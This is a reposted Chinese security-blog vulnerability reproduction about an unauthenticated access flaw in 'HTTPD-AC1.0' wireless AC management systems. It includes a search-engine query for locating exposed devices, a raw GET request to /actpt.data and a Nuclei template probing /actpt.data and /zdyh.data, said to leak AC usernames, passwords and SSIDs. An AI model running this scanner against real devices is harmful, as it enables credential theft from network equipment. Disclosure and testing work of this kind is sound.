HTTPD-AC1.0服务未授权漏洞

admin 2024年9月17日15:59:30评论46 views字数 849阅读2分49秒阅读模式
 

No.1

前言

多款AC集中管理平台、智能AC管理系统、智能路由系统(HTTPD-AC1.0服务)均被发现存在严重的未授权访问安全漏洞。此漏洞允许攻击者未经授权地直接访问多个data文件,进而非法获取包括AC用户名、密码、SSID(服务集标识符)、AP BSSID(接入点基站标识符)等在内的敏感及关键信息,对系统安全构成重大威胁。
No.2

系统主页

    搜索语法header="HTTPD_ac 1.0"。
HTTPD-AC1.0服务未授权漏洞

No.3

测试POC

    测试POC。
GET /actpt.data HTTP/1.1Content-Type: application/jsonHost: {{Hostname}}

HTTPD-AC1.0服务未授权漏洞

No.4

测试脚本

    Nuclei脚本POC。
id: POC-HTTPD-AC-Unauthorized-Datainfo:  name: HTTPD-AC1.0服务未授权漏洞  author: Husky  severity: medium  metadata:    Hunter-query: header.server=="HTTPD_ac 1.0"http:  - raw:      - |        @timeout: 30s        GET /actpt.data HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json      - |        @timeout: 30s        GET /zdyh.data HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json    matchers:      - type: dsl        dsl:          - status_code_1==200 && contains_all(body_1,"ap_name","device_id","vlan_id")          - status_code_2==200 && contains_all(body_2,"list:","web_type",":")# Enhanced by mp on 2024/08/24

 

原文始发于微信公众号(剁椒Muyou鱼头):【漏洞复现】HTTPD-AC1.0服务未授权漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月17日15:59:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTTPD-AC1.0服务未授权漏洞https://cn-sec.com/archives/3176129.html

发表评论

匿名网友 填写信息